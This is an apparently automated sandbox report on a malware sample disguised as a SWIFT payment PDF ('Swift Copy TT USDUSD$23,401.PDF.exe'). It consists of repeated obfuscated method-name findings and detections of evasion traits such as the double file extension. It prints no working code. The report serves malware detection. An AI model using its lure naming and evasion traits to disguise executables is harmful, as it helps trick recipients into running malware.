                Source: 0.2.Swift Copy TT USDUSD$23,401.PDF.exe.4707a48.2.raw.unpack, BQD6XWzbHEffuGqKR0.csHigh entropy of concatenated method names: 'kWWUmXHWUK', 'EO6UQmevYC', 'y4MUkWs9ud', 'JuOU4RFqFs', 'Oc4UrXXNov', 'r32Ux4UiCt', 'l9BUHqvXWB', 'lW3Uct9Jgs', 'EwBU8ECyLh', 'TpfUpLLUFI'
                Source: 0.2.Swift Copy TT USDUSD$23,401.PDF.exe.4707a48.2.raw.unpack, fqhchwBgphISV1i3HW.csHigh entropy of concatenated method names: 'VYQhEmLMc9', 'TEKhCrGr8Y', 'UmaFNdJCOs', 'mWfFJGITvM', 'u6Fhsurqgu', 'rENh2Z6wfJ', 'fvehafKeIe', 'JTjhVsxBvF', 'qqKhP29f31', 'r44hW3AKFM'
                Source: 0.2.Swift Copy TT USDUSD$23,401.PDF.exe.4707a48.2.raw.unpack, OPPpkDkjPXW6MvfLTh.csHigh entropy of concatenated method names: 'A2TGDtB9BW', 'KrmGm5PerZ', 'c77GQ1Dy7x', 'OGpGkRQFOr', 'YAoGTLR4SH', 'EP8Gq7bLyK', 'dIFGh1gVEB', 'kH2GFZuGhN', 'FPmGMn3D0a', 'iy5GUfSIfn'
                Source: 0.2.Swift Copy TT USDUSD$23,401.PDF.exe.4707a48.2.raw.unpack, QN8LhUv7Bq01pTrSfL.csHigh entropy of concatenated method names: 'ittw9bmqBI', 'LDiwlJ1Vx8', 'YHgwLwCWp3', 'auKwGRkx7u', 'p5Pw0j2qef', 'F6IwosHllH', 'xQ2wngomO6', 'kVXwvrqq3h', 'YGDw5iL08O', 'bflw7BhXQS'
                Source: 0.2.Swift Copy TT USDUSD$23,401.PDF.exe.4707a48.2.raw.unpack, sphcUmQKOWkVh4kjRk.csHigh entropy of concatenated method names: 'QB7LVw5mcx', 'VHkLPstL5w', 'f46LWYkC3h', 'xalLiyHD7F', 'OFwLuDBS5l', 'rYwLBSZZqS', 'PakLjIbFlF', 'S6WLEYkL0x', 'R8aLOx6tjA', 'F0QLCrFaAo'
                Source: 0.2.Swift Copy TT USDUSD$23,401.PDF.exe.4707a48.2.raw.unpack, brR4fRI3jDiiDKeLQt.csHigh entropy of concatenated method names: 'Bcqn8NaLmS', 'PXRnpmqrv8', 'UlanX3i8Pc', 'R1TnDVFf9p', 'QBDnROCfJE', 'ga8nmFSM1Y', 'YapnKUuusg', 'OnOnQavg4D', 'lAPnkaVMYu', 'cIonZQjllw'
                Source: 0.2.Swift Copy TT USDUSD$23,401.PDF.exe.4707a48.2.raw.unpack, OP5y05SJkYcDfUh8rR.csHigh entropy of concatenated method names: 'z1UJnphcUm', 'COWJvkVh4k', 'AjPJ7XW6Mv', 'tLTJ6hrBAA', 'awgJTuvMMB', 'ljGJqQCpHf', 'EnneT0fmsqaX4YKcF2', 'r0Mi8UD0tZdAXtvaN8', 'sCAJJZoexA', 'W62Jw9yxDR'
                Source: 0.2.Swift Copy TT USDUSD$23,401.PDF.exe.4707a48.2.raw.unpack, wlMmXiamMflVnhmrlw.csHigh entropy of concatenated method names: 'wCldQyZ4kP', 'PnvdkTViGj', 'eDKd4HlZe1', 'SDrdrh6vR2', 'VuAdxSdsuM', 'SsddH75tVO', 'qsvdtoHgPa', 'W9SdeepSjO', 'kn3dYuHwGa', 'WdJdsHseQb'
                Source: 0.2.Swift Copy TT USDUSD$23,401.PDF.exe.4707a48.2.raw.unpack, sFr5UQ3VBmJh4eof1E.csHigh entropy of concatenated method names: 'ng6Xj58xJ', 'KZRDLqdwD', 'Jv8mPhmsx', 'rGFKOhZW5', 'hL1kOjnnr', 'ksLZtM7Ro', 'e1YaOdGlHTresbxUDQ', 'DlDLl23ljtNNi3L0Jm', 'Q37FBm4g7', 'ICfU7HnKT'
                Source: 0.2.Swift Copy TT USDUSD$23,401.PDF.exe.4707a48.2.raw.unpack, hv2DojJN0ku3NnWw1iq.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'y9sUscGeVe', 'bdAU2lw3Pc', 'rQfUaRC3TA', 'aoUUVPCuYZ', 'S7lUPQn3U8', 'jNPUWxHSUg', 'bXEUioEja1'
                Source: 0.2.Swift Copy TT USDUSD$23,401.PDF.exe.4707a48.2.raw.unpack, wPm8JEVKZAg6qnsJjZ.csHigh entropy of concatenated method names: 'iIWTY0T8MD', 'YwTT2GljJE', 'C5FTVH0ORo', 'VfpTPbZalW', 'onQTrA221k', 'yl7TgeByDM', 'E4WTxZwABU', 'xB8THXg2Bx', 'MBNT1m6CDK', 'EOJTtDqys8'
                Source: 0.2.Swift Copy TT USDUSD$23,401.PDF.exe.4707a48.2.raw.unpack, VbT0MOLP8g50MBtTv3.csHigh entropy of concatenated method names: 'Dispose', 'hDhJOXoeYb', 'iwi3rtt17J', 'Mwxa1b5Qna', 'fV4JCS0v8D', 'p3XJzCQFZs', 'ProcessDialogKey', 'uv63NQ7wrt', 'seq3JtYQkP', 'GOP33Kvg56'
                Source: 0.2.Swift Copy TT USDUSD$23,401.PDF.exe.4707a48.2.raw.unpack, HKxMO2JJUh9Xie2wOrL.csHigh entropy of concatenated method names: 'd1lUCO2c2u', 'NOBUzv8kq3', 'kbwfNRuLal', 'GW2fJHkYfa', 'PpVf3AcO2q', 'cLmfwbRKUn', 'SjVfSJEyTW', 'dOGf9nNk8j', 'DRifleVKN8', 'udFfL5Oo0f'
                Source: 0.2.Swift Copy TT USDUSD$23,401.PDF.exe.4707a48.2.raw.unpack, wYYTswJScuZEGg3uOyx.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'gbDyMA1YiI', 'GJdyU9IqKl', 'MEKyf4mVgt', 'wIOyyfN2Kx', 'AtOyA5QFiF', 'vZBybivFWR', 'wLFycb6Wml'
                Source: 0.2.Swift Copy TT USDUSD$23,401.PDF.exe.8af0000.6.raw.unpack, GAk8ihtBa5W1IjF2oS.csHigh entropy of concatenated method names: 'FYGnlNxysf', 'xOVnGwpYl5', 'uPtnogQOkG', 'wwLoClvjtY', 'aKYozJjbJY', 'R7ZnNdLlUr', 'JatnJsa0pC', 'hYin31KGid', 'NIQnwmvcs1', 'SV3nSjlQLG'
                Source: 0.2.Swift Copy TT USDUSD$23,401.PDF.exe.8af0000.6.raw.unpack, nQ7wrtOUeqtYQkPrOP.csHigh entropy of concatenated method names: 'Db8M4R0Hmp', 'js1MrA49jI', 'mmEMgHZsD4', 'ey6MxSPn8a', 'SagMHB3QYe', 'E71M1JAk3J', 'P93Mt0F4Lm', 'rCZMeJevIs', 'wQjMITYJHi', 'thmMYtBfS2'
                Source: 0.2.Swift Copy TT USDUSD$23,401.PDF.exe.8af0000.6.raw.unpack, jU4QiGWcKqOGdqRA7H.csHigh entropy of concatenated method names: 'ToString', 'JDDqsYAahk', 'KKNqrG6Nbk', 'eyaqg4SsuQ', 'DvxqxgJ5Ir', 'PRxqHlU6ba', 'Rbnq1lbe6o', 'HZ9qtieX1g', 'KLHqevNFOc', 'MMWqINxIs6'
                Source: 0.2.Swift Copy TT USDUSD$23,401.PDF.exe.8af0000.6.raw.unpack, Cvg56jCKLuGN9qnAmj.csHigh entropy of concatenated method names: 'RgOUGfp5YA', 'TOKU0BTw5s', 'tDUUoFBWiH', 'tB3UndQGbT', 'XUgUM2tVr2', 'JlnUvhVJvT', 'Next', 'Next', 'Next', 'NextBytes'
                Source: 0.2.Swift Copy TT USDUSD$23,401.PDF.exe.8af0000.6.raw.unpack, A2a2n9jgNGDhXoeYbl.csHigh entropy of concatenated method names: 'cE6MTvx2ta', 'vCaMhMjhRn', 'vt3MMaK9LQ', 'BUqMfXOvPA', 'roDMA5BIcD', 'ywxMcw37ol', 'Dispose', 'eMHFlFOBhO', 'UntFLiu6c3', 'dJ7FGj1rer'
                Source: 0.2.Swift Copy TT USDUSD$23,401.PDF.exe.8af0000.6.raw.unpack, rMB5jG4QCpHfhvHovr.csHigh entropy of concatenated method names: 'OLTo90hjoo', 'REXoL2T6rL', 'P4qo0uPjd0', 'SI3ontHvC4', 'IyJovVxWkW', 'zZY0uuorgs', 'Eq30Bh4von', 'YiU0jZKtRQ', 'b8T0EDQK0o', 'VDZ0OuosmW'
                Source: 0.2.Swift Copy TT USDUSD$23,401.PDF.exe.8af0000.6.raw.unpack, YiBkDligENmtVURwGC.csHigh entropy of concatenated method names: 'scTh7SGolb', 'Xx0h6MOZ07', 'ToString', 'aENhlTZeKH', 'jyuhLBCgiK', 'jTphGyDTBk', 'gRoh0OjOJj', 'BViho7rOfC', 'E66hnnSU1J', 'vLohvF7A5U'
                Source: 0.2.Swift Copy TT USDUSD$23,401.PDF.exe.8af0000.6.raw.unpack, HBAAU6Zc1wT5mNwguv.csHigh entropy of concatenated method names: 'aCq0R2Hdxh', 'BMd0KHl48O', 'B9yGgV0XAt', 'KcmGxvgcVX', 'mFRGHggDcH', 'bNKG1wmEBF', 'IMTGtpdEMY', 'JZDGe6h5Yp', 'vYJGIAD3LR', 'jRWGYHTbFH'
                Source: 0.2.Swift Copy TT USDUSD$23,401.PDF.exe.8af0000.6.raw.unpack, BQD6XWzbHEffuGqKR0.csHigh entropy of concatenated method names: 'kWWUmXHWUK', 'EO6UQmevYC', 'y4MUkWs9ud', 'JuOU4RFqFs', 'Oc4UrXXNov', 'r32Ux4UiCt', 'l9BUHqvXWB', 'lW3Uct9Jgs', 'EwBU8ECyLh', 'TpfUpLLUFI'
                Source: 0.2.Swift Copy TT USDUSD$23,401.PDF.exe.8af0000.6.raw.unpack, fqhchwBgphISV1i3HW.csHigh entropy of concatenated method names: 'VYQhEmLMc9', 'TEKhCrGr8Y', 'UmaFNdJCOs', 'mWfFJGITvM', 'u6Fhsurqgu', 'rENh2Z6wfJ', 'fvehafKeIe', 'JTjhVsxBvF', 'qqKhP29f31', 'r44hW3AKFM'
                Source: 0.2.Swift Copy TT USDUSD$23,401.PDF.exe.8af0000.6.raw.unpack, OPPpkDkjPXW6MvfLTh.csHigh entropy of concatenated method names: 'A2TGDtB9BW', 'KrmGm5PerZ', 'c77GQ1Dy7x', 'OGpGkRQFOr', 'YAoGTLR4SH', 'EP8Gq7bLyK', 'dIFGh1gVEB', 'kH2GFZuGhN', 'FPmGMn3D0a', 'iy5GUfSIfn'
                Source: 0.2.Swift Copy TT USDUSD$23,401.PDF.exe.8af0000.6.raw.unpack, QN8LhUv7Bq01pTrSfL.csHigh entropy of concatenated method names: 'ittw9bmqBI', 'LDiwlJ1Vx8', 'YHgwLwCWp3', 'auKwGRkx7u', 'p5Pw0j2qef', 'F6IwosHllH', 'xQ2wngomO6', 'kVXwvrqq3h', 'YGDw5iL08O', 'bflw7BhXQS'
                Source: 0.2.Swift Copy TT USDUSD$23,401.PDF.exe.8af0000.6.raw.unpack, sphcUmQKOWkVh4kjRk.csHigh entropy of concatenated method names: 'QB7LVw5mcx', 'VHkLPstL5w', 'f46LWYkC3h', 'xalLiyHD7F', 'OFwLuDBS5l', 'rYwLBSZZqS', 'PakLjIbFlF', 'S6WLEYkL0x', 'R8aLOx6tjA', 'F0QLCrFaAo'
                Source: 0.2.Swift Copy TT USDUSD$23,401.PDF.exe.8af0000.6.raw.unpack, brR4fRI3jDiiDKeLQt.csHigh entropy of concatenated method names: 'Bcqn8NaLmS', 'PXRnpmqrv8', 'UlanX3i8Pc', 'R1TnDVFf9p', 'QBDnROCfJE', 'ga8nmFSM1Y', 'YapnKUuusg', 'OnOnQavg4D', 'lAPnkaVMYu', 'cIonZQjllw'
                Source: 0.2.Swift Copy TT USDUSD$23,401.PDF.exe.8af0000.6.raw.unpack, OP5y05SJkYcDfUh8rR.csHigh entropy of concatenated method names: 'z1UJnphcUm', 'COWJvkVh4k', 'AjPJ7XW6Mv', 'tLTJ6hrBAA', 'awgJTuvMMB', 'ljGJqQCpHf', 'EnneT0fmsqaX4YKcF2', 'r0Mi8UD0tZdAXtvaN8', 'sCAJJZoexA', 'W62Jw9yxDR'
                Source: 0.2.Swift Copy TT USDUSD$23,401.PDF.exe.8af0000.6.raw.unpack, wlMmXiamMflVnhmrlw.csHigh entropy of concatenated method names: 'wCldQyZ4kP', 'PnvdkTViGj', 'eDKd4HlZe1', 'SDrdrh6vR2', 'VuAdxSdsuM', 'SsddH75tVO', 'qsvdtoHgPa', 'W9SdeepSjO', 'kn3dYuHwGa', 'WdJdsHseQb'
                Source: 0.2.Swift Copy TT USDUSD$23,401.PDF.exe.8af0000.6.raw.unpack, sFr5UQ3VBmJh4eof1E.csHigh entropy of concatenated method names: 'ng6Xj58xJ', 'KZRDLqdwD', 'Jv8mPhmsx', 'rGFKOhZW5', 'hL1kOjnnr', 'ksLZtM7Ro', 'e1YaOdGlHTresbxUDQ', 'DlDLl23ljtNNi3L0Jm', 'Q37FBm4g7', 'ICfU7HnKT'
                Source: 0.2.Swift Copy TT USDUSD$23,401.PDF.exe.8af0000.6.raw.unpack, hv2DojJN0ku3NnWw1iq.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'y9sUscGeVe', 'bdAU2lw3Pc', 'rQfUaRC3TA', 'aoUUVPCuYZ', 'S7lUPQn3U8', 'jNPUWxHSUg', 'bXEUioEja1'
                Source: 0.2.Swift Copy TT USDUSD$23,401.PDF.exe.8af0000.6.raw.unpack, wPm8JEVKZAg6qnsJjZ.csHigh entropy of concatenated method names: 'iIWTY0T8MD', 'YwTT2GljJE', 'C5FTVH0ORo', 'VfpTPbZalW', 'onQTrA221k', 'yl7TgeByDM', 'E4WTxZwABU', 'xB8THXg2Bx', 'MBNT1m6CDK', 'EOJTtDqys8'
                Source: 0.2.Swift Copy TT USDUSD$23,401.PDF.exe.8af0000.6.raw.unpack, VbT0MOLP8g50MBtTv3.csHigh entropy of concatenated method names: 'Dispose', 'hDhJOXoeYb', 'iwi3rtt17J', 'Mwxa1b5Qna', 'fV4JCS0v8D', 'p3XJzCQFZs', 'ProcessDialogKey', 'uv63NQ7wrt', 'seq3JtYQkP', 'GOP33Kvg56'
                Source: 0.2.Swift Copy TT USDUSD$23,401.PDF.exe.8af0000.6.raw.unpack, HKxMO2JJUh9Xie2wOrL.csHigh entropy of concatenated method names: 'd1lUCO2c2u', 'NOBUzv8kq3', 'kbwfNRuLal', 'GW2fJHkYfa', 'PpVf3AcO2q', 'cLmfwbRKUn', 'SjVfSJEyTW', 'dOGf9nNk8j', 'DRifleVKN8', 'udFfL5Oo0f'
                Source: 0.2.Swift Copy TT USDUSD$23,401.PDF.exe.8af0000.6.raw.unpack, wYYTswJScuZEGg3uOyx.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'gbDyMA1YiI', 'GJdyU9IqKl', 'MEKyf4mVgt', 'wIOyyfN2Kx', 'AtOyA5QFiF', 'vZBybivFWR', 'wLFycb6Wml'
                Source: 0.2.Swift Copy TT USDUSD$23,401.PDF.exe.478fa68.3.raw.unpack, GAk8ihtBa5W1IjF2oS.csHigh entropy of concatenated method names: 'FYGnlNxysf', 'xOVnGwpYl5', 'uPtnogQOkG', 'wwLoClvjtY', 'aKYozJjbJY', 'R7ZnNdLlUr', 'JatnJsa0pC', 'hYin31KGid', 'NIQnwmvcs1', 'SV3nSjlQLG'
                Source: 0.2.Swift Copy TT USDUSD$23,401.PDF.exe.478fa68.3.raw.unpack, nQ7wrtOUeqtYQkPrOP.csHigh entropy of concatenated method names: 'Db8M4R0Hmp', 'js1MrA49jI', 'mmEMgHZsD4', 'ey6MxSPn8a', 'SagMHB3QYe', 'E71M1JAk3J', 'P93Mt0F4Lm', 'rCZMeJevIs', 'wQjMITYJHi', 'thmMYtBfS2'
                Source: 0.2.Swift Copy TT USDUSD$23,401.PDF.exe.478fa68.3.raw.unpack, jU4QiGWcKqOGdqRA7H.csHigh entropy of concatenated method names: 'ToString', 'JDDqsYAahk', 'KKNqrG6Nbk', 'eyaqg4SsuQ', 'DvxqxgJ5Ir', 'PRxqHlU6ba', 'Rbnq1lbe6o', 'HZ9qtieX1g', 'KLHqevNFOc', 'MMWqINxIs6'
                Source: 0.2.Swift Copy TT USDUSD$23,401.PDF.exe.478fa68.3.raw.unpack, Cvg56jCKLuGN9qnAmj.csHigh entropy of concatenated method names: 'RgOUGfp5YA', 'TOKU0BTw5s', 'tDUUoFBWiH', 'tB3UndQGbT', 'XUgUM2tVr2', 'JlnUvhVJvT', 'Next', 'Next', 'Next', 'NextBytes'
                Source: 0.2.Swift Copy TT USDUSD$23,401.PDF.exe.478fa68.3.raw.unpack, A2a2n9jgNGDhXoeYbl.csHigh entropy of concatenated method names: 'cE6MTvx2ta', 'vCaMhMjhRn', 'vt3MMaK9LQ', 'BUqMfXOvPA', 'roDMA5BIcD', 'ywxMcw37ol', 'Dispose', 'eMHFlFOBhO', 'UntFLiu6c3', 'dJ7FGj1rer'
                Source: 0.2.Swift Copy TT USDUSD$23,401.PDF.exe.478fa68.3.raw.unpack, rMB5jG4QCpHfhvHovr.csHigh entropy of concatenated method names: 'OLTo90hjoo', 'REXoL2T6rL', 'P4qo0uPjd0', 'SI3ontHvC4', 'IyJovVxWkW', 'zZY0uuorgs', 'Eq30Bh4von', 'YiU0jZKtRQ', 'b8T0EDQK0o', 'VDZ0OuosmW'
                Source: 0.2.Swift Copy TT USDUSD$23,401.PDF.exe.478fa68.3.raw.unpack, YiBkDligENmtVURwGC.csHigh entropy of concatenated method names: 'scTh7SGolb', 'Xx0h6MOZ07', 'ToString', 'aENhlTZeKH', 'jyuhLBCgiK', 'jTphGyDTBk', 'gRoh0OjOJj', 'BViho7rOfC', 'E66hnnSU1J', 'vLohvF7A5U'
                Source: 0.2.Swift Copy TT USDUSD$23,401.PDF.exe.478fa68.3.raw.unpack, HBAAU6Zc1wT5mNwguv.csHigh entropy of concatenated method names: 'aCq0R2Hdxh', 'BMd0KHl48O', 'B9yGgV0XAt', 'KcmGxvgcVX', 'mFRGHggDcH', 'bNKG1wmEBF', 'IMTGtpdEMY', 'JZDGe6h5Yp', 'vYJGIAD3LR', 'jRWGYHTbFH'
                Source: 0.2.Swift Copy TT USDUSD$23,401.PDF.exe.478fa68.3.raw.unpack, BQD6XWzbHEffuGqKR0.csHigh entropy of concatenated method names: 'kWWUmXHWUK', 'EO6UQmevYC', 'y4MUkWs9ud', 'JuOU4RFqFs', 'Oc4UrXXNov', 'r32Ux4UiCt', 'l9BUHqvXWB', 'lW3Uct9Jgs', 'EwBU8ECyLh', 'TpfUpLLUFI'
                Source: 0.2.Swift Copy TT USDUSD$23,401.PDF.exe.478fa68.3.raw.unpack, fqhchwBgphISV1i3HW.csHigh entropy of concatenated method names: 'VYQhEmLMc9', 'TEKhCrGr8Y', 'UmaFNdJCOs', 'mWfFJGITvM', 'u6Fhsurqgu', 'rENh2Z6wfJ', 'fvehafKeIe', 'JTjhVsxBvF', 'qqKhP29f31', 'r44hW3AKFM'
                Source: 0.2.Swift Copy TT USDUSD$23,401.PDF.exe.478fa68.3.raw.unpack, OPPpkDkjPXW6MvfLTh.csHigh entropy of concatenated method names: 'A2TGDtB9BW', 'KrmGm5PerZ', 'c77GQ1Dy7x', 'OGpGkRQFOr', 'YAoGTLR4SH', 'EP8Gq7bLyK', 'dIFGh1gVEB', 'kH2GFZuGhN', 'FPmGMn3D0a', 'iy5GUfSIfn'
                Source: 0.2.Swift Copy TT USDUSD$23,401.PDF.exe.478fa68.3.raw.unpack, QN8LhUv7Bq01pTrSfL.csHigh entropy of concatenated method names: 'ittw9bmqBI', 'LDiwlJ1Vx8', 'YHgwLwCWp3', 'auKwGRkx7u', 'p5Pw0j2qef', 'F6IwosHllH', 'xQ2wngomO6', 'kVXwvrqq3h', 'YGDw5iL08O', 'bflw7BhXQS'
                Source: 0.2.Swift Copy TT USDUSD$23,401.PDF.exe.478fa68.3.raw.unpack, sphcUmQKOWkVh4kjRk.csHigh entropy of concatenated method names: 'QB7LVw5mcx', 'VHkLPstL5w', 'f46LWYkC3h', 'xalLiyHD7F', 'OFwLuDBS5l', 'rYwLBSZZqS', 'PakLjIbFlF', 'S6WLEYkL0x', 'R8aLOx6tjA', 'F0QLCrFaAo'
                Source: 0.2.Swift Copy TT USDUSD$23,401.PDF.exe.478fa68.3.raw.unpack, brR4fRI3jDiiDKeLQt.csHigh entropy of concatenated method names: 'Bcqn8NaLmS', 'PXRnpmqrv8', 'UlanX3i8Pc', 'R1TnDVFf9p', 'QBDnROCfJE', 'ga8nmFSM1Y', 'YapnKUuusg', 'OnOnQavg4D', 'lAPnkaVMYu', 'cIonZQjllw'
                Source: 0.2.Swift Copy TT USDUSD$23,401.PDF.exe.478fa68.3.raw.unpack, OP5y05SJkYcDfUh8rR.csHigh entropy of concatenated method names: 'z1UJnphcUm', 'COWJvkVh4k', 'AjPJ7XW6Mv', 'tLTJ6hrBAA', 'awgJTuvMMB', 'ljGJqQCpHf', 'EnneT0fmsqaX4YKcF2', 'r0Mi8UD0tZdAXtvaN8', 'sCAJJZoexA', 'W62Jw9yxDR'
                Source: 0.2.Swift Copy TT USDUSD$23,401.PDF.exe.478fa68.3.raw.unpack, wlMmXiamMflVnhmrlw.csHigh entropy of concatenated method names: 'wCldQyZ4kP', 'PnvdkTViGj', 'eDKd4HlZe1', 'SDrdrh6vR2', 'VuAdxSdsuM', 'SsddH75tVO', 'qsvdtoHgPa', 'W9SdeepSjO', 'kn3dYuHwGa', 'WdJdsHseQb'
                Source: 0.2.Swift Copy TT USDUSD$23,401.PDF.exe.478fa68.3.raw.unpack, sFr5UQ3VBmJh4eof1E.csHigh entropy of concatenated method names: 'ng6Xj58xJ', 'KZRDLqdwD', 'Jv8mPhmsx', 'rGFKOhZW5', 'hL1kOjnnr', 'ksLZtM7Ro', 'e1YaOdGlHTresbxUDQ', 'DlDLl23ljtNNi3L0Jm', 'Q37FBm4g7', 'ICfU7HnKT'
                Source: 0.2.Swift Copy TT USDUSD$23,401.PDF.exe.478fa68.3.raw.unpack, hv2DojJN0ku3NnWw1iq.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'y9sUscGeVe', 'bdAU2lw3Pc', 'rQfUaRC3TA', 'aoUUVPCuYZ', 'S7lUPQn3U8', 'jNPUWxHSUg', 'bXEUioEja1'
                Source: 0.2.Swift Copy TT USDUSD$23,401.PDF.exe.478fa68.3.raw.unpack, wPm8JEVKZAg6qnsJjZ.csHigh entropy of concatenated method names: 'iIWTY0T8MD', 'YwTT2GljJE', 'C5FTVH0ORo', 'VfpTPbZalW', 'onQTrA221k', 'yl7TgeByDM', 'E4WTxZwABU', 'xB8THXg2Bx', 'MBNT1m6CDK', 'EOJTtDqys8'
                Source: 0.2.Swift Copy TT USDUSD$23,401.PDF.exe.478fa68.3.raw.unpack, VbT0MOLP8g50MBtTv3.csHigh entropy of concatenated method names: 'Dispose', 'hDhJOXoeYb', 'iwi3rtt17J', 'Mwxa1b5Qna', 'fV4JCS0v8D', 'p3XJzCQFZs', 'ProcessDialogKey', 'uv63NQ7wrt', 'seq3JtYQkP', 'GOP33Kvg56'
                Source: 0.2.Swift Copy TT USDUSD$23,401.PDF.exe.478fa68.3.raw.unpack, HKxMO2JJUh9Xie2wOrL.csHigh entropy of concatenated method names: 'd1lUCO2c2u', 'NOBUzv8kq3', 'kbwfNRuLal', 'GW2fJHkYfa', 'PpVf3AcO2q', 'cLmfwbRKUn', 'SjVfSJEyTW', 'dOGf9nNk8j', 'DRifleVKN8', 'udFfL5Oo0f'
                Source: 0.2.Swift Copy TT USDUSD$23,401.PDF.exe.478fa68.3.raw.unpack, wYYTswJScuZEGg3uOyx.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'gbDyMA1YiI', 'GJdyU9IqKl', 'MEKyf4mVgt', 'wIOyyfN2Kx', 'AtOyA5QFiF', 'vZBybivFWR', 'wLFycb6Wml'

                Hooking and other Techniques for Hiding and Protection

                barindex
                Uses an obfuscated file name to hide its real file extension (double extension)
                Source: Possible double extension: pdf.exeStatic PE information: Swift Copy TT USDUSD$23,401.PDF.exe
                Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdateJump to behavior
                Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRootJump to behavior
                Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Swift Copy TT USDUSD$23,401.PDF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
